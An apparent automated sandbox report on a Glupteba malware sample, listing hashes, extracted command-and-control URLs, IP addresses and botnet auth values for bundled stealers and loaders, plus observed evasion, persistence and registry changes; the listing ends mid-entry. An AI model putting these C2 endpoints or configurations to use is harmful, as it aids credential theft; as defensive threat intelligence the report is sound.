glupteba | 35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b

Analysis

max time kernel
62s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
22-02-2022 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe
Size

8.0MB
MD5

b5a7d4bcf58342c24c97740b02561157
SHA1

ffd3c6015d57079117f629ed13de7b0d4d8e6c38
SHA256

35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b
SHA512

1da3434742dcc589eac575763c5ad990a99c089d98d985ac1fda4d4847d6e5f9892249529b715cea6c98ff53e687dbb77ce56a05667905de1ec67c8cffffeed1

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

cosmos

45.67.231.245:10429

Extracted

Family

redline

Botnet

ruzzki

5.182.5.22:32245

Attributes

auth_value
d8127a7fd667fc38cff03ff9ec89f346

Extracted

Family

redline

Botnet

333333

2.56.57.212:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4668-182-0x0000000005370000-0x0000000005C96000-memory.dmp	family_glupteba
behavioral2/memory/4668-183-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/3600-199-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba
behavioral2/memory/5700-213-0x0000000000400000-0x0000000000D41000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3892 3380 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3892	3380	rUNdlL32.eXe

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5712-234-0x0000000000700000-0x0000000000931000-memory.dmp	family_redline
behavioral2/memory/5712-237-0x0000000000702000-0x0000000000738000-memory.dmp	family_redline
behavioral2/memory/5712-240-0x0000000000702000-0x0000000000738000-memory.dmp	family_redline
behavioral2/memory/5712-249-0x0000000000700000-0x0000000000931000-memory.dmp	family_redline
behavioral2/memory/5712-251-0x0000000000700000-0x0000000000931000-memory.dmp	family_redline
behavioral2/memory/5876-250-0x0000000000E00000-0x0000000000E1E000-memory.dmp	family_redline
behavioral2/memory/6316-279-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/6872-286-0x00000000001B0000-0x0000000000343000-memory.dmp	family_redline
behavioral2/memory/7040-294-0x00000000007B0000-0x0000000000972000-memory.dmp	family_redline
behavioral2/memory/1396-308-0x0000000000750000-0x00000000008DB000-memory.dmp	family_redline
behavioral2/memory/6776-327-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/6084-332-0x0000000003B00000-0x0000000003B2F000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 2840 created 480 2840 WerFault.exe rundll32.exe
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 4860 created 4668 4860 svchost.exe Info.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

description	pid	process	target process
PID 2840 created 480	2840	WerFault.exe	rundll32.exe

description	pid	process	target process
PID 4860 created 4668	4860	svchost.exe	Info.exe

Executes dropped EXE 15 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeInfo.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exeFolder.exejfiag3g_gg.exejfiag3g_gg.exeInfo.execsrss.exeTUUDIht0amfahOK6j4PYMVKS.exe

pid	process
4780	SoCleanInst.exe
1456	md9_1sjm.exe
2708	Folder.exe
4668	Info.exe
4404	Updbdate.exe
2936	Install.exe
4960	Files.exe
4772	pub2.exe
2452	File.exe
2568	Folder.exe
2064	jfiag3g_gg.exe
4884	jfiag3g_gg.exe
3600	Info.exe
5700	csrss.exe
5272	TUUDIht0amfahOK6j4PYMVKS.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exeFolder.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	35f091b664a3cc7cf68f24a8f0257b6de05fc465a449b1eb69557501b4019f5b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

480 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
480	rundll32.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/4296-271-0x0000000000860000-0x0000000000C23000-memory.dmp	themida
behavioral2/memory/4296-281-0x0000000000860000-0x0000000000C23000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeInfo.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MistyButterfly = "\"C:\\Windows\\rss\\csrss.exe\""	Info.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

315 ipinfo.io
343 ipinfo.io
396 ipinfo.io
24 ip-api.com
168 ipinfo.io
169 ipinfo.io
314 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
315	ipinfo.io
343	ipinfo.io
396	ipinfo.io
24	ip-api.com
168	ipinfo.io
169	ipinfo.io
314	ipinfo.io

Drops file in Program Files directory 2 IoCs

Processes:

setup.exe

description	ioc	process
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\680a2b8c-5b45-4025-9e8a-f9304716a6e9.tmp	setup.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129010647.pma	setup.exe

Drops file in Windows directory 9 IoCs

Processes:

svchost.exeInfo.exeWerFault.exe

description	ioc	process
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\ReportingEvents.log	svchost.exe
File created	C:\Windows\rss\csrss.exe	Info.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log	svchost.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\DataStore.edb	svchost.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File opened for modification	C:\Windows\WindowsUpdate.log	svchost.exe
File opened for modification	C:\Windows\rss	Info.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3780	480	WerFault.exe	rundll32.exe
2100	4668	WerFault.exe	Info.exe
60	4668	WerFault.exe	Info.exe
4236	4668	WerFault.exe	Info.exe
1876	4668	WerFault.exe	Info.exe
3164	4668	WerFault.exe	Info.exe
2776	4668	WerFault.exe	Info.exe
5032	4668	WerFault.exe	Info.exe
1652	4668	WerFault.exe	Info.exe
3108	4668	WerFault.exe	Info.exe
952	4668	WerFault.exe	Info.exe
3192	4668	WerFault.exe	Info.exe
3396	4668	WerFault.exe	Info.exe
4780	4668	WerFault.exe	Info.exe
4064	4668	WerFault.exe	Info.exe
4416	4668	WerFault.exe	Info.exe
3616	4668	WerFault.exe	Info.exe
4936	4668	WerFault.exe	Info.exe
5088	4668	WerFault.exe	Info.exe
2308	4668	WerFault.exe	Info.exe
3396	4668	WerFault.exe	Info.exe
4780	4668	WerFault.exe	Info.exe
3624	3600	WerFault.exe	Info.exe
3412	3600	WerFault.exe	Info.exe
4768	3600	WerFault.exe	Info.exe
3544	3600	WerFault.exe	Info.exe
3444	3600	WerFault.exe	Info.exe
3676	3600	WerFault.exe	Info.exe
4768	3600	WerFault.exe	Info.exe
3012	3600	WerFault.exe	Info.exe
5144	3600	WerFault.exe	Info.exe
5180	3600	WerFault.exe	Info.exe
5236	3600	WerFault.exe	Info.exe
5272	3600	WerFault.exe	Info.exe
5308	3600	WerFault.exe	Info.exe
5344	3600	WerFault.exe	Info.exe
5400	3600	WerFault.exe	Info.exe
5544	3600	WerFault.exe	Info.exe
5152	5700	WerFault.exe	csrss.exe
5224	5700	WerFault.exe	csrss.exe
5276	5700	WerFault.exe	csrss.exe
4920	5700	WerFault.exe	csrss.exe
5376	5700	WerFault.exe	csrss.exe
5548	5700	WerFault.exe	csrss.exe
4048	5700	WerFault.exe	csrss.exe
5712	5700	WerFault.exe	csrss.exe
5772	5700	WerFault.exe	csrss.exe
2432	5700	WerFault.exe	csrss.exe
5752	5700	WerFault.exe	csrss.exe
4752	5700	WerFault.exe	csrss.exe
2244	5700	WerFault.exe	csrss.exe
2216	5700	WerFault.exe	csrss.exe
1168	5700	WerFault.exe	csrss.exe
3444	5700	WerFault.exe	csrss.exe
5132	5700	WerFault.exe	csrss.exe
3340	6084	WerFault.exe	HnhmWAXA1vv_sVba7bhB_zYb.exe
2908	5700	WerFault.exe	csrss.exe
4920	1268	WerFault.exe	ZENwstoCOvj4kyxegUeAFaW7.exe
5244	4752	WerFault.exe	g5DwWYBPiU4sBDGLgSvU5E5H.exe
5680	2456	WerFault.exe	qVSY5UtnGbP_4lTRaeTRslRz.exe
6744	5412	WerFault.exe	G9Yz3uMK4MCc_dmyA1b2v5Yf.exe
6980	1268	WerFault.exe	ZENwstoCOvj4kyxegUeAFaW7.exe
4804	5700	WerFault.exe	csrss.exe
6596	5412	WerFault.exe	G9Yz3uMK4MCc_dmyA1b2v5Yf.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe	nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\2AE01nVMiapJqBWSfAMrLtgW.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5816 schtasks.exe
6564 schtasks.exe
6480 schtasks.exe
6768 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

4688 tasklist.exe

pid	process
5816	schtasks.exe
6564	schtasks.exe
6480	schtasks.exe
6768	schtasks.exe

pid	process
4688	tasklist.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3600 taskkill.exe

pid	process
3600	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Info.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2002 = "Cabo Verde Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Info.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	Info.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
